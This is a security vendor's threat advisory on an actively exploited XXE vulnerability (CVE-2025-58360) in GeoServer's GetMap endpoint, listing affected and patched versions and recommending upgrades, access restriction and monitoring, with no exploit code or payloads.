Security Intelligence
Loading table of contents...
Loading table of contents...
At a glance: CISA has confirmed active exploitation of a critical XXE vulnerability in OSGeo GeoServer. The flaw allows crafted XML requests to the unauthenticated GetMap endpoint to expose sensitive files, enable SSRF, or cause denial of service. Upgrade to a patched release. Field Effect MDR will issue AROs for vulnerable or internet-exposed GeoServer instances and detect suspicious XML payloads.
Threat summary
On December 11, CISA added a critical vulnerability in OSGeo GeoServer to its Known Exploited Vulnerabilities catalog, noting active exploitation in the wild.
GeoServer is an open-source platform widely used to publish and share geospatial data through Open Geospatial Consortium services such as Web Map Service. Its adoption spans government, research, and commercial organizations, making the exposure broad.
The flaw, tracked as CVE‑2025‑58360, is an XML External Entity (XXE) vulnerability affecting GeoServer version 2.26.1 and earlier. The vulnerability lies in GeoServer’s map request function, specifically the GetMap endpoint. The server fails to properly validate crafted XML map requests, which could allow a threat actor to insert hidden instructions that expose sensitive files or internal systems. Exploitation can lead to arbitrary file access, server‑side request forgery, and denial of service. The Common Vulnerability Scoring System (CVSS) v3 score of 9.8 was assigned, indicating critical severity.
GeoServer maintainers released patches on November 25, 2025, in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1.
Insights & mitigations
Any internet-facing GeoServer instance can be targeted without authentication, creating a direct path for data leakage. The vulnerability is not complex to exploit. XXE attacks are well-documented, and exploitation requires only crafted XML requests to a known endpoint. This increases the likelihood of opportunistic scanning and automated exploitation across internetfacing GeoServer deployments.
GeoServer administrators are recommended to upgrade to the latest patched version beyond 2.26.1. Where patching is not immediately possible, restricting access to the `/geoserver/wms` endpoint and monitoring for anomalous XML requests are recommended interim measures.
Field Effect MDR users will be alerted via ARO if vulnerable and/or internetexposed GeoServer instances are detected in their environment. For an additional layer of defense, Field Effect MDR detects suspicious activity such as unusual or malformed XML payloads, especially those attempting to define external entities.
Stay on top of emerging threats like this.
Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.
.jpg)
.jpg)